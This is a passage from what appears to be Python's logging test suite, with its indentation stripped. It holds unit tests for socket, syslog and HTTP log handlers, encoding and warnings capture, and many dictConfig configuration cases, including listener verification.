self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls(('localhost', server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context)
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
#See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since both handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
